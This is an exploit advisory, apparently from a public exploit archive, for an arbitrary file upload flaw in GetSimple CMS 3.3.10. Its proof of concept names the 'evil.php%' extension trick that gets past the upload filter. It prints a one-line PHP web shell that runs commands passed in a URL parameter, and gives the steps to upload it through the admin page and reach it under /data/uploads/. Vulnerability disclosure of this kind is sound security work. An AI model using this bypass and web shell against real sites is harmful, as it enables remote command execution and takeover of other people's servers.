45 lines
No EOL
1.4 KiB
Text
45 lines
No EOL
1.4 KiB
Text
# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
|
|
# Google Dork: -
|
|
# Date: 23/06/2016
|
|
# Exploit Author: s0nk3y
|
|
# Vendor Homepage: http://get-simple.info/
|
|
# Category: webapps
|
|
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
|
|
# Version: 3.3.10
|
|
# Tested on: Ubuntu 16.04 / Mozilla Firefox
|
|
# Twitter: http://twitter.com/s0nk3y
|
|
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi
|
|
|
|
Description
|
|
========================
|
|
|
|
GetSimple CMS has been downloaded over 120,000 times (as of March 2013).
|
|
The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises
|
|
the simplicity yet possible extensibility through plug-ins.
|
|
|
|
Vulnerability
|
|
========================
|
|
|
|
GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability
|
|
which allows an attacker to upload a backdoor.
|
|
|
|
This vulnerability is that the application uses a blacklist and whitelist
|
|
technique to compare the file against mime types and extensions.
|
|
|
|
Proof of Concept
|
|
========================
|
|
|
|
For exploiting this vulnerability we will create a file by adding the percent
|
|
behind extension.
|
|
1. evil.php% <--- this is simple trick :)
|
|
<?php
|
|
// simple backdoor
|
|
system($_GET['cmd']);
|
|
?>
|
|
2. An attacker login to the admin page and uploading the backdoor
|
|
3. The uploaded file will be under the "/data/uploads/" folder
|
|
|
|
Report Timeline
|
|
========================
|
|
2016-06-23 : Vulnerability reported to vendor
|
|
2016-06-23 : Disclosure |